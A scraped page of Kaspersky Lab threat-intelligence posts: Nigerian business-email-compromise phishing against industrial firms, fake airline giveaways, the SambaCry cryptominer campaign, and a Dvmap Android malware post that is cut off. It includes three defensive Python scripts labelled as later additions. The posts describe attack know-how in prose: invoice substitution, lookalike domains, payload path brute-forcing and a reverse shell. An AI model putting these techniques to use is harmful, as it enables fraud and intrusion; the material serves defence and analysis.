Malware Alerts

Online headquarters of Kaspersky Lab security experts.

Nigerian phishing: Industrial companies under attack

Thu, 06/15/2017 - 05:00

In late 2016, the Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) reported on phishing attacks that were primarily targeting industrial companies from the metallurgy, electric power, construction, engineering and other sectors. As further research demonstrated, this was just part of a bigger story that began much earlier and is unlikely to end any time soon.

Targeted Attack

In October 2016, Kaspersky Lab products detected a surge in malware infection attempts on the computers of our customers who had industrial control systems installed. The malware used in these attacks was a specific modification of an exploit for a vulnerability dating back to 2015.

Further analysis of the incident led us to phishing messages disguised as business correspondence that were used to distribute the exploit.

Phishers have long since discovered the advantages of attacking companies (they obviously have much more money in their accounts than ordinary users and they usually conduct much larger transactions than individuals). The emails used in such attacks are made to look as legitimate as possible so that the employees who receive them open the accompanying malicious attachments without giving them much thought.

In this case, we were dealing with well crafted phishing messages that targeted not only commercial organizations but, in most cases, industrial enterprises. All in all, we discovered over 500 attacked companies in more than 50 countries. Most of these companies are industrial enterprises and large transportation and logistics corporations.

The Emails

The emails were sent on behalf of various companies that did business with potential victims: suppliers, customers, commercial organizations and delivery services. The emails asked recipients to check information in an invoice as soon as possible, clarify product pricing or receive goods specified in the delivery note attached.

Examples of phishing emails

The phishers clearly tried hard to make their fake messages look very convincing to the employees of targeted companies. We have seen attachments with names such as “Energy & Industrial Solutions W.L.L_pdf”, “Woodeck Specifications best Prices Quote.uue” and “Saudi Aramco Quotation Request for October 2016”.

Malicious Files

All the emails had malicious attachments: RTF files with an exploit for the CVE-2015-1641 vulnerability, archives of different formats containing malicious executable files, as well as documents with macros and OLE objects designed to download malicious executable files.

In late 2016, our mail antivirus solutions detected between several hundred and several thousand emails per day containing this exploit for CVE-2015-1641.

Number of daily mail antivirus detections
of the exploit for CVE-2015-1641 (Exploit.MSWord.Agent.hp)

A characteristic feature of such phishing campaigns is that the number of emails sent varies depending on the day of the week: fewer emails are sent on weekends than weekdays.

The malware used in these attacks belonged to families that are popular among cybercriminals, such as ZeuS, Pony/FareIT, LokiBot, Luminosity RAT, NetWire RAT, HawkEye, ISR Stealer, and iSpy keylogger. The phishers selected a toolset that included the functionality they needed, choosing from malware available on cybercriminal forums. At the same time, the malware was packed using VB and .NET packers – a distinct feature of this campaign. To evade detection by security tools, the malicious files were regularly repacked using new modifications of the same packers.

The attackers used malware belonging to at least eight different Trojan-Spy and Backdoor families. All malicious programs selected for these attacks are designed primarily to steal confidential data and install stealthy remote administration tools on infected systems.

Domains Used by the Attackers

When we extracted C&C addresses from the detected malicious files, it turned out that in some cases the same resources were used as command-and-control servers for malware from different families. From this, it can be concluded that either there is one cybercriminal group behind these attacks, using different malware families, or different groups are cooperating closely with each other and using the same C&C to communicate to “their” malware.

The domain names of some of the malware command-and-control servers used by the attackers mimicked domain names used by industrial companies – more proof that the attacks were primarily targeting industrial companies.

An analysis of these domain names sheds light on the tactics used by the phishers. They try to register the same domain name as the targeted company’s legitimate resource, but in a different top-level domain. If this is impossible, the attackers register a domain with a name that looks very similar to the legitimate domain’s name (a standard technique is to replace one or more characters). We have also seen another technique used in these attacks: the domain name is made up of the legitimate site’s name and the name of its top-level domain.

Malware CnC      Real industrial company site
hi***            hi***
em***            em***
lus***           lus***

Phishing domain names mimicking legitimate domain names
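The three mimicry patterns described above (same name under a different top-level domain, one or more substituted characters, and the legitimate name concatenated with its TLD) can be checked mechanically against a list of C&C domains extracted from samples. The script below is an added example written for this page, not code from Kaspersky Lab ICS CERT; every domain name in it is constructed, and it assumes single-label public suffixes (a name such as example.co.uk would need a public-suffix list).

```python
"""Classify observed C&C domains against a company's legitimate domain.

Added example for the domain-mimicry tactics described in the post; it is
not Kaspersky Lab ICS CERT code. All domain names below are constructed.
"""


def split_domain(fqdn):
    """Return (name, tld) for a registrable domain such as 'acmesteel.com'.

    Assumption: a single-label public suffix. Multi-label suffixes such as
    'co.uk' would need a public-suffix list, which is out of scope here.
    """
    fqdn = fqdn.lower().strip().strip(".")
    name, _, tld = fqdn.rpartition(".")
    return name, tld


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def classify(candidate, legit):
    """Return the mimicry pattern 'candidate' uses against 'legit', or None."""
    c_name, c_tld = split_domain(candidate)
    l_name, l_tld = split_domain(legit)
    if (c_name, c_tld) == (l_name, l_tld):
        return None                               # the genuine domain itself
    if c_name == l_name:
        return "same-name-different-tld"          # acmesteel.net for acmesteel.com
    if c_name == l_name + l_tld:
        return "name-plus-tld"                    # acmesteelcom.com for acmesteel.com
    threshold = 1 if len(l_name) < 6 else 2       # tolerate fewer edits on short names
    if edit_distance(c_name, l_name) <= threshold:
        return "character-substitution"           # acrnesteel.com for acmesteel.com
    return None


def find_lookalikes(candidates, legit_domains):
    """Return (candidate, legitimate_domain, pattern) for every suspicious candidate."""
    hits = []
    for cand in candidates:
        for legit in legit_domains:
            pattern = classify(cand, legit)
            if pattern:
                hits.append((cand, legit, pattern))
    return hits


# Constructed sample: one legitimate company domain and C&C names taken from samples.
LEGIT_DOMAINS = ["acmesteel.com"]
OBSERVED_CNC = ["acmesteel.net", "acmesteelcom.com", "acrnesteel.com",
                "acme-steel.com", "update-cdn.example", "acmesteel.com"]

if __name__ == "__main__":
    for cand, legit, pattern in find_lookalikes(OBSERVED_CNC, LEGIT_DOMAINS):
        print(f"{cand:22} mimics {legit} ({pattern})")
```

Running it on the constructed list reports four of the six names; the genuine domain and the unrelated hosting name pass through. The edit-distance threshold is deliberately small, because on a short label two edits already reach many unrelated words.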

In some cases, the attackers gained unauthorized access to the legitimate websites of industrial companies and used them as a platform for hosting malware and C&C servers. The websites were accessed using credentials stolen earlier from infected computers used by the companies’ employees.

Compromised legitimate site

In the course of our investigation we found that, according to the publicly available information provided by Whois services, most domains used for malware C&C servers were registered to residents of Nigeria. All indications are that these were business email compromise (BEC) attacks that have come to be associated with Nigerian cybercriminals.

Attack Scenario

Business email compromise attacks are well-known. Several scenarios for these attacks have been described to date. Some of these scenarios were used in the targeted attacks we have been investigating.

Attack outline

In the first stage, phishers send emails with malicious attachments – Trojan-Spies or Backdoors. All malware used is available on the black market. It is worth noting that a complete set of malware for carrying out this type of attack usually costs no more than US$200.

Among other things, we have discovered messages sent using compromised email accounts of company employees, in which cybercriminals sent malicious attachments to corporate addresses at other companies.

After infecting a corporate computer, the attackers are able to make screenshots of the correspondence using malware or set up hidden redirection of messages from the attacked computer’s mailbox to their own mailbox. This enables them to track which transactions are being prepared in the company.

After selecting the most promising transaction among those in the pipeline, the attackers register domain names that are very similar to the names of the seller companies. Using the newly registered domains, the cybercriminals are able to carry out a man-in-the-middle attack: they intercept the email with the seller’s invoice and forward it to the buyer after replacing the seller’s account details with the details of an account belonging to the attackers. Alternatively, they can send a request on behalf of the seller for an urgent change of bank details in addition to the seller’s legitimate email containing the invoice.

Hijacking the correspondence between the seller and the buyer using a phishing email address

Another option for the cybercriminals is to send the emails on behalf of a seller with a spoofed email header, so that the message appears to come from the seller’s legitimate mailbox. It’s worth saying that this way of sending emails is less reliable, as some programs and mail servers can reveal the replacement.
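The "replacement" a mail server can reveal is visible in the headers: a spoofed From address has to be paired with a Reply-To or Return-Path the attacker controls, and a receiving MTA that checks SPF or DKIM records the failure in Authentication-Results. The script below is an added example for this page, not Kaspersky Lab code; both messages, the phrase list and the hostnames are constructed, and it assumes the receiving server adds an Authentication-Results header.

```python
"""Flag header inconsistencies and payment-change requests in an email.

Added example for the spoofed-sender and invoice-substitution scenario in the
post; it is not Kaspersky Lab code. Both messages below are constructed.
"""
import email
from email.utils import parseaddr

# Phrases typical of an "urgent change of bank details" request (constructed list).
PAYMENT_CHANGE_PHRASES = ("bank details", "new account", "beneficiary",
                          "wire instructions", "payment method")


def domain_of(header_value):
    """Extract the lower-cased domain from an address header, '' if absent."""
    _, address = parseaddr(header_value or "")
    return address.rpartition("@")[2].lower()


def body_text(msg):
    """Collect the text/plain content of a parsed message."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode("utf-8", "replace"))
    return "\n".join(chunks)


def check_message(raw):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    msg = email.message_from_string(raw)
    findings = []
    from_dom = domain_of(msg.get("From"))
    # A spoofed From points at the seller's real mailbox, so compare it with the
    # headers the attacker needs for replies and bounces to reach them instead.
    for header in ("Reply-To", "Return-Path"):
        dom = domain_of(msg.get(header))
        if dom and dom != from_dom:
            findings.append(f"{header} domain {dom} differs from From domain {from_dom}")
    # Receiving MTAs record SPF/DKIM/DMARC results; a failure is a strong signal.
    auth = (msg.get("Authentication-Results") or "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        if f"{mech}=fail" in auth:
            findings.append(f"{mech.upper()} failed according to Authentication-Results")
    # Content check: the scam needs the buyer to change where the money goes.
    text = (msg.get("Subject", "") + "\n" + body_text(msg)).lower()
    if any(phrase in text for phrase in PAYMENT_CHANGE_PHRASES):
        findings.append("Message asks for a change of payment details; confirm by phone")
    return findings


# Constructed messages: one spoofed BEC attempt and one genuine invoice email.
SPOOFED = """\
Return-Path: <bounce@relay-host.example>
Authentication-Results: mx.buyer.example; spf=fail smtp.mailfrom=relay-host.example
From: "Acme Steel Accounts" <accounts@acmesteel.com>
Reply-To: accounts@acmesteel.net
To: purchasing@buyer.example
Subject: Invoice 4471 - urgent change of bank details
Content-Type: text/plain; charset=utf-8

Please note that our bank details have changed. Remit payment for
invoice 4471 to the new account in the attached invoice.
"""

GENUINE = """\
Return-Path: <accounts@acmesteel.com>
Authentication-Results: mx.buyer.example; spf=pass smtp.mailfrom=acmesteel.com
From: "Acme Steel Accounts" <accounts@acmesteel.com>
To: purchasing@buyer.example
Subject: Invoice 4471
Content-Type: text/plain; charset=utf-8

Please find invoice 4471 attached. Payment terms are unchanged.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("genuine", GENUINE)):
        print(label, check_message(raw) or ["no findings"])
```

The header checks alone are not proof: legitimate mailing systems also use a different Return-Path, and a seller whose own mailbox was compromised (as the post describes) sends mail that passes every one of them. That is why the content check ends with the same advice as the post's Protection Measures: confirm any change of bank details out of band.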

In any event the chances of the recipient never suspecting anything and the criminals getting the money are very high.

Nigerian Fishing

‘Nigerian letters’ (a.k.a. 419 scams) have become classics of online fraud. The creators of fascinating stories about heiresses/widows/secretaries/lawyers of deceased millionaires/disgraced dictators/other fat cats didn’t win the Ig Nobel Prize for literature in 2005 for nothing. They may not be very highly qualified, but they certainly have a talent for extortion, and may well have been profiting from the greed and gullibility of their victims for years.

Several years ago, Nigerian phishers appeared on the radar of researchers. They were the same scammers who specialized in so-called Nigerian letters, but at the same time they were mastering new techniques for stealing money – this time, from companies. They are usually the ones behind business email compromise attacks.

There have been a good many publications on phishing attacks by Nigerian fraudsters in the past three years. This is no coincidence: this relatively new type of criminal business is gaining momentum. According to FBI estimates, the damage from Nigerian phisher activity from October 2013 to May 2016 exceeded US$3 billion and the number of affected companies was as high as 22,143. Those companies are scattered across 79 countries of the world.

In 2013-2015, mostly small and medium-size companies were attacked. The phishers gathered the email addresses of potential victims on the Internet.

Cybercriminals exchanging addresses for phishing email distribution. Most addresses are on publicly available email services

Since the fraudsters are interested primarily in companies that buy and sell, they use resources such as Alibaba.

Message with spoofed header and replaced banking details allegedly sent from Alibaba seller’s legitimate email

Phishers also buy databases of email addresses that are of interest to them. Addresses belonging to different categories of company are available on the black market. Relatively small industrial companies are among those targeted by phishers.

An offer to buy categorized email addresses sent to a Nigerian phisher

Clearly, targeted attacks focusing on specific regions already took place in 2015. The screenshot below shows a message that confirms the purchase of a database of UAE company addresses by a Nigerian phisher. This purchase set the cybercriminal back $99.

Purchase of an email address database for attacks on UAE companies by a Nigerian phisher

Some cybercriminals are prepared to pay a small fortune for email addresses:

Purchase of corporate data by a Nigerian phisher for $995

Hunting the Big Phish

Cybercriminals want to steal as much money as possible in one go. As a result, the companies attacked in 2016 included some major corporations.

The average value of a sales transaction can be quite high for a large company. Apparently, Nigerian hackers took note of this in 2016. We believe that a group of Nigerian phishers (or several groups working together) chose industrial and transportation companies as their main targets in 2016.

For example, Palo Alto Networks published two reports, in June 2015 and February 2016, based on their analysis of phishing attacks against companies. These reports painted a familiar picture: Nigerian attackers used targeted phishing emails and malware that steals confidential data – a Trojan-Spy called KeyBase was used in those attacks. Remarkably, unlike the 2015 attack, the 2016 attack targeted primarily industrial companies.

In August 2016, our colleague studied a series of phishing attacks that he dubbed Operation Ghoul. Operation Ghoul also made use of targeted phishing emails that contained malware designed to steal authentication credentials from different applications, including KeyBase. That operation in fact had much in common with the targeted attacks that we detected in the fall of 2016. In both cases, the attacks targeted mostly industrial companies and the texts of phishing emails and attached files were very similar. We also noticed fake emails sent in both campaigns on behalf of the same sender – Emirates NDB Bank. Finally, in the Operation Ghoul attacks we found files packed with a specific .NET packer (sold on hacker forums as Data Protector) that was one of the markers of the attacks we uncovered.

In the attacks analyzed by Kaspersky Lab, industrial companies account for over 80% of potential victims.

Potential Losses

Nigerian phishing attacks are particularly dangerous for industrial companies. In the event of a successful attack, the company making a purchase not only loses money but also fails to receive the goods they need on time. This can be critical for industrial companies: if the goods are raw materials used in manufacturing or spare parts needed to repair equipment, their non-delivery can result in downtime or failure to perform scheduled maintenance or commissioning and start-up work.

However, there are other possible consequences, as well. The spyware programs used by phishers send a variety of information from infected machines to their command-and-control servers.

We analyzed data from some command-and-control servers used in 2017 attacks. The amount and contents of data obtained by Nigerian phishers is truly disturbing. Cybercriminals have gained access to information on industrial companies’ operations and main assets, including information on contracts and projects.

For example, screenshots found on malware command-and-control servers included various cost estimates and project plans for some of the current projects at victim enterprises.

Screenshots from infected computers

We also found screenshots that were clearly not made on the computers of project managers or procurement managers, but rather on the workstations of operators, engineers, designers and architects. They show, among other things, technical drawings, floor plans, diagrams showing the structure of electrical and information networks.

Screenshots from infected computers

Clearly, this is not needed to carry out the cybercriminals’ Nigerian scams. What do they do with this information? Do they destroy it after completing an attack? Could someone order the theft of data from a specific company?

So far, we have not seen any of the information stolen by Nigerian cybercriminals on the black market. However, it is clear that, for the companies being attacked, in addition to the direct financial loss a Nigerian phishing attack poses other, possibly more serious, threats.

This malicious phishing campaign is ongoing and is unlikely to cease in the foreseeable future.

Phishing attacks against industrial companies continue

Nigerian phishing is clearly a profitable type of cybercrime that does not require significant financial investment or a high level of technical knowledge. It appears that Nigerian threat actors don’t face stiff competition, at least for now: they readily share information as well as command-and-control servers used by malware. However, as in the case of Nigerian letter scams, this type of cybercriminal activity can easily be adopted by other criminals. That is if they haven’t already done so, of course.

P.S. The Hidden Threat

And last – though by no means least – it is very dangerous if as a result of an infection cybercriminals gain access to computers that are part of an industrial control system (ICS). In such cases, they can gain remote access to the ICS and unauthorized control over industrial processes.

Remote access to SCADA machines enables attackers to simply switch industrial equipment off or change its settings. There are known cases of hackers changing the parameters of an industrial process without any obvious malicious intent – simply out of curiosity. In 2016, Verizon published a data breach digest that describes several attacks investigated by the company, including one aimed at the systems of an unnamed US water utility. In the course of the attack, the cybercriminals managed to infiltrate the control system and change the amounts of chemicals used to treat tap water and the flow rate. At the same time, according to Verizon experts, the hackers didn’t understand what the results of the changes they were making would be and changed the settings randomly. In this context, it has to be hoped that the interests of Nigerian phishers will be limited to stealing money and that they won’t tamper with ICS controls.

Unfortunately, there is no guarantee that people who want to carry out acts of sabotage will not gain access to computers in industrial enterprises, including SCADA systems.

Protection Measures

The following measures are needed to mitigate attacks which involve social engineering techniques:

  • Regularly brief employees on security rules when working with email and the Internet. Train employees in the basic rules of cyber-hygiene, such as not opening suspicious links and attachments, carefully checking sender and recipient addresses, company names and the actual domain names from which messages were sent.
  • Inform employees not only about the tools that can be used by cybercriminals, but also about the fraudulent schemes they use.
  • In the course of conducting a transaction, if an unexpected request is received from the seller to change the bank details, payment methods or other parameters of the transaction, it is best to contact the seller by phone or using other methods unrelated to email and ask for confirmation of the changes.

The following protection measures are recommended to minimize the risk of infection and any damage from attacks:

  • Install a security solution on all workstations and servers where possible.
  • Keep security software, signature databases, heuristic and decision rule databases up to date.
  • Where possible, install operating system and software updates without delay.
  • In the event of a system being compromised, change the passwords for all accounts used on that system.
  • Promptly send suspicious emails, attachments and domain names for analysis to highly qualified experts, such as Kaspersky Lab ICS CERT experts.

On industrial information systems, whose composition and configuration cannot be changed quickly, the greatest effect can be achieved by using application startup control and device control technologies in whitelisting mode in combination with application behavior control technologies and protection against network attacks. We also recommend the following measures:

  • Install tools that provide passive monitoring of network activity on the industrial network, capable of detecting newly connected devices, suspicious network connections, and malware network communication. These tools will help to detect and monitor attempts by threat actors to penetrate the enterprise’s network. Importantly, some of these tools are very easy to install and do not require the composition or configuration of the industrial control systems to be changed in any way.
  • Install tools that provide deep analysis of network traffic on the industrial network and detection of commands that can potentially disrupt the industrial process. Using this class of system is absolutely necessary for the detection and timely prevention of advanced attacks designed to physically damage an enterprise’s systems and carried out by highly qualified external or internal threat actors. This type of technology can also be implemented passively, without any impact on the operation of industrial control systems.
  • Minimize the range and quantity of software products used in ICS segments.
  • Restrict the use of computers that are part of an ICS for purposes unrelated to the industrial processes. These measures can be implemented using application startup control tools included in endpoint security solutions.

High-quality and properly configured security solutions help to protect an enterprise against the vast majority of chance infections and many targeted attacks, especially those carried out using tools that are not particularly sophisticated.

Two Tickets as Bait

Sat, 06/10/2017 - 09:21

Over the previous weekend, social networks were hit with a wave of posts that falsely claimed that major airlines were giving away tickets for free. Users from all over the world became involved in this: they published posts that mentioned Emirates, Air France, Aeroflot, S7 Airline, Eva Air, Turkish Airlines, Air Asia, Air India, and other companies. We cannot rule out that similar posts mentioning other brands may appear in the near future as well.

Naturally, there have been no promotions to give away airline tickets. Users were addressed by fraudsters who assumed the names of the largest airlines in order to subscribe their victims to paid mobile services, collect personal data, install malware, and increase traffic to websites with advertisements and dubious content. To do this, fraudsters have been registering a multitude of domains, where they host content on behalf of well-known brands. At the mentioned resources, users are congratulated on winning two airline tickets. Then, they’re asked to perform a series of actions to receive the gift. As a result, the victim ends up on another website that belongs to fraudsters, which monetizes their “work” and spreads information about the nonexistent campaign on a social network.

An example of a social-network post with a link to a fraudulent website

This is by no means the first case where users themselves have started spreading fraudulent content on social networks. We have previously written about a fake petition in defense of Suarez, which was distributed by Facebook users, fake donations, and pornware. All of these incidents have one thing in common: the threats are distributed over social networks, and users themselves often participate in spreading them.

The attack model

Let us return to the most recent case and examine it a bit closer. By following the link from a social network news feed, a user navigates to a fraudulent website. We have found a series of domains that belong to fraudsters, along with many others.

Some examples of fraudulent websites that make use of famous airline brands

Since the fraudulent schemes only varied by logo, language, and color scheme, depending on the brand, let’s take one website out of the many and discuss it. The website that claims to belong to American Airlines contains information about a promotional giveaway of two tickets to respondents who must answer three questions.

An example of a fraudulent website that uses American Airlines branding.

After completing the survey, the victim is asked to take two more steps. First, the victim is asked to post the promotional information on his or her page on a social network and thank the airline in the comment. Secondly, the victim has to click the “Like” button. It should be noted that the web page shows what appear to be Facebook comments from users who have already won tickets. An investigation showed that the comments are actually fake. We can even leave our own comment, but it will disappear after the page is refreshed. All of this is directed at coaxing a victim into believing that the page is legitimate.

We would like to note that most comments are posted in various languages by the same people, and the messages are similar in content and most likely are translated using machine translation.

After performing all of the necessary actions, the website redirects the user to various web pages by using the geolocation feature. In some cases, we were redirected to the websites shown below.

Each time all of the same aforementioned actions are performed and the same survey is completed, the website does something different and may redirect users to various web pages. We have found websites with a variety of dubious content, including lotteries, advertisements, new surveys with giveaways, links to suspicious files that can be downloaded, and so on.

Among other things, some websites suggest that users download a certain useful file and at the same time urge them to install a potentially dangerous browser extension. The extension obtains permission to read all of the data in a browser, potentially allowing fraudsters to get hold of passwords, logins, credit-card data, and other confidential information entered by the user. Aside from that, later on, the extension may continue spreading links that redirect users to the extension itself on Facebook, but on behalf of the user and among his or her friends. This is exactly the threat that was carried out by an attack that we discussed previously.

At the moment of publication, this indicated extension alone had been installed on the systems of over 5,000 users, according to the statistics of the web apps store.

The number of victims and their location

Most resources that utilize the fraudulent scheme contain links to external services that collect statistics for website traffic. These data show that the attack was widely distributed and was mostly directed at smartphone users. For example, here are some impressive statistics for only two of all the domains that we discovered.

Traffic statistics for the fraudulent websites

Unfortunately, numerous users took the bait of the fraudsters. These users tried their luck and did not pay attention to a multitude of signs that are typical for a scam, which resulted in spreading potentially dangerous content among friends over a social network.

Some examples of published posts with links to fraudulent websites

Thus, fraudulent web resources and a plethora of their counterparts across the Internet gained huge popularity in a matter of hours. The possibilities of social networks are endless when it comes to spreading information across the globe. These fraudsters only confirm this fact.

Some examples of published posts with links to fraudulent websites

Finally, here are a few pieces of advice.

  • You should be sensibly skeptical about similar “promotions”. Before navigating to suspicious links and entering your personal data on a web resource, you should contact a representative of the company that is supposedly running the promotion and confirm the information.
  • A scrupulous examination of a web resource’s address will help identify fraud. It may be a good idea to verify whether the domain belongs to the company indicated on the website or not. Services that provide whois data about domains may prove helpful in that endeavor.
  • Be responsible when posting content from your account on a social network. In order to avoid becoming involved in a fraudulent scheme, do not spread information with questionable authenticity.
  • Do not install suspicious browser extensions. Upon detection of an installed extension that seems suspicious or whose purpose you do not remember, delete the extension immediately in the settings section of your browser and change the passwords of websites that you visit, especially those dealing with online banking.
  • Use security solutions that protect users from phishing, such as Internet Security-level solutions and higher. They will block any attempts to navigate your browser to fraudulent websites.

SambaCry is coming

Fri, 06/09/2017 - 18:07

Not long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue. The story was about a new vulnerability for *nix-based systems – EternalRed (aka SambaCry). This vulnerability (CVE-2017-7494) relates to all versions of Samba, starting from 3.5.0, which was released in 2010, and was patched only in the latest versions of the package (4.6.4/4.5.10/4.4.14).

On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt payload of EternalBlue and WannaCry. Surprisingly, it was a cryptocurrency mining utility!

Vulnerability exploitation

In order to check that an unauthorized user has permissions to write to the network drive, the attackers first try to write a text file, consisting of 8 random symbols. If the attempt is successful they delete the file.

Writing and deleting the text file

After this check, it is time for the exploit’s payload (it is assembled as a Samba plugin). After successful exploitation of the vulnerability, this runs with super-user privileges, although first the attackers have to guess the full path to the dropped file with their payload, starting from the root directory of the drive. We can see such attempts in the traffic captured on our honeypot. They are just brute-forcing the most obvious paths (specified in different manuals, etc.), where files can be stored on the drive.

Bruteforcing the path to the payload

After the path to the file is found, it can be loaded and executed in the context of the Samba-server process, using the SambaCry vulnerability. Afterwards the file is deleted in order to hide the traces. From this moment it exists and runs only in the virtual memory.
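The two preconditions of the exploitation chain just described are a write-accessible share and an unpatched smbd, and a defender can audit both from smb.conf and the version string. The script below is an added example written for this page; it is not code from the post or from the Samba project. It compares the version against the fixed releases named above (4.6.4/4.5.10/4.4.14), lists writable shares, and looks for the vendor-documented workaround `nt pipe support = no` in [global]. The smb.conf text is constructed, and the version check assumes upstream version numbers (a distribution that backports the fix under an older version number would be reported as vulnerable).

```python
"""Audit a Samba configuration for the preconditions of CVE-2017-7494.

Added example, not code from the blog post or the Samba project. The
configuration text below is constructed for illustration.
"""
import re

# Branch -> first fixed release, as listed in the post. Branches older than
# 4.4 received no fix; branches newer than 4.6 were released after the fix.
FIXED = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}


def version_vulnerable(version):
    """True if an smbd reporting this upstream version is affected."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(g) for g in m.groups())
    if parts < (3, 5, 0):
        return False                     # vulnerable code was added in 3.5.0
    if parts[:2] in FIXED:
        return parts < FIXED[parts[:2]]
    return parts < (4, 4, 0)             # unfixed old branch vs. post-fix new branch


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lower-cased keys."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")


def share_writable(opts):
    """Samba synonyms: writable/writeable/write ok = yes, or read only = no."""
    for key in ("writable", "writeable", "write ok"):
        if key in opts:
            return is_yes(opts[key])
    if "read only" in opts:
        return not is_yes(opts["read only"])
    return False                         # Samba's default is read only = yes


def audit(conf_text, smbd_version):
    """Return a list of findings for the given configuration and version."""
    findings = []
    if version_vulnerable(smbd_version):
        findings.append(f"smbd {smbd_version} is affected by CVE-2017-7494; upgrade")
    conf = parse_smb_conf(conf_text)
    if is_yes(conf.get("global", {}).get("nt pipe support", "yes")):
        findings.append("workaround 'nt pipe support = no' is not set in [global]")
    for name, opts in conf.items():
        if name in ("global", "printers") or is_yes(opts.get("printable", "no")):
            continue                     # print shares are not file-drop targets here
        if share_writable(opts):
            guest = is_yes(opts.get("guest ok", opts.get("public", "no")))
            who = "guests" if guest else "authenticated users"
            findings.append(f"share [{name}] is writable by {who}")
    return findings


# Constructed smb.conf with one guest-writable share and one staff-writable share.
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
   security = user
   map to guest = Bad User

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no

[docs]
   path = /srv/samba/docs
   writable = yes
   valid users = @staff

[printers]
   path = /var/spool/samba
   printable = yes
   guest ok = yes
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, "4.5.7"):
        print("-", finding)
```

A writable share reachable by authenticated users is still reported, because the exploit only needs write access, not anonymous access; a stolen domain credential is enough. Setting `nt pipe support = no` blocks the named-pipe path the exploit uses but also disables some Windows client functionality, so it is a stop-gap until the upgrade the post recommends.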

In our case two files were uploaded and executed in such a way: (349d84b3b176bbc9834230351ef3bc2a – and (2009af3fed2a4704c224694dfc4b31dc – Trojan-Downloader.Linux.EternalMiner.a).

This file stores the simplest reverse-shell. It connects to the particular port of the IP-address specified by its owner, giving him remote access to the shell (/bin/sh). As a result, the attackers have an ability to execute remotely any shell-commands. They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim’s computer.

Listing of

It’s worth noting that a similar payload can be found in the implementation of the SambaCry exploit in Metasploit.

The main functionality of this file is to download and execute one of the most popular open-source cryptocurrency mining utilities – cpuminer (minerd). It is done by the hardcoded shell-command, shown on the screenshot below.

The main functionality of

The file minerd64_s (8d8bdb58c5e57c565542040ed1988af9 — RiskTool.Linux.BitCoinMiner.a) downloaded in such a way is stored in /tmp/m on the victim’s system.

Cpuminer and what it actually mines

The interesting part is that the version of cpuminer used is “upgraded”, so it can be launched without any parameters to mine currency directly to the hardcoded attackers’ wallet. We obviously became interested in this wallet, so we decided to investigate a bit and uncover the balance of the attackers account.

Along with the attackers’ wallet number, the pool address ( can be found in the body of the miner. This pool is created for mining the open-source cryptocurrency – monero. Using all this data we managed to check out the balance on the attackers’ wallet and the full log of transactions. Let’s have a look:

Balance of the attackers’ account on 08.06.2017

Log of transactions with all the attackers’ cryptocurrency income

The mining utility is downloaded from the domain registered on April 29th 2017. According to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th. During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.

Considering that the world discovered the EternalRed vulnerability only at the end of May, and the attackers had already adopted it, the rate of growth in the number of infected machines has significantly increased. After about a month of mining, the attackers gained 98 XMR, which means they earned about $5,500 according to the currency exchange rate at the time of writing.


As a result, the attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers. In addition, through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim’s computer with other types of malware.

At the moment we don’t have any information about the actual scale of the attack. However, this is a great reason for system administrators and ordinary Linux users to update their Samba software to the latest version immediately to prevent future problems.

Dvmap: the first Android malware with code injection

Thu, 06/08/2017 - 04:58

In April 2017 we started observing new rooting malware being distributed through the Google Play Store. Unlike other rooting malware, this Trojan not only installs its modules into the system, it also injects malicious code into the system runtime libraries. Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a.

The distribution of rooting malware through Google Play is not a new thing. For example, the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016. But Dvmap is very special rooting malware. It uses a variety of new techniques, but the most interesting thing is that it injects malicious code into the system libraries – or

This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime, and it has been downloaded from the Google Play Store more than 50,000 times. Kaspersky Lab reported the Trojan to Google, and it has now been removed from the store.

Trojan.AndroidOS.Dvmap.a on Google Play

To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March 2017, and would then update it with a malicious version for a short period of time. Usually they would upload a clean version back to Google Play the very same day. They did this at least 5 times between 18 April and 15 May.

All the malicious Dvmap apps had the same functionality. They decrypt several archive files from the assets folder of the installation package, and launch an executable file from them with the name “start.”

Encrypted archives in the assets folder

The interesting thing is that the Trojan supports even the 64-bit version of Android, which is very rare.

Part of code where the Trojan chooses between 32-bit and 64-bit compatible files

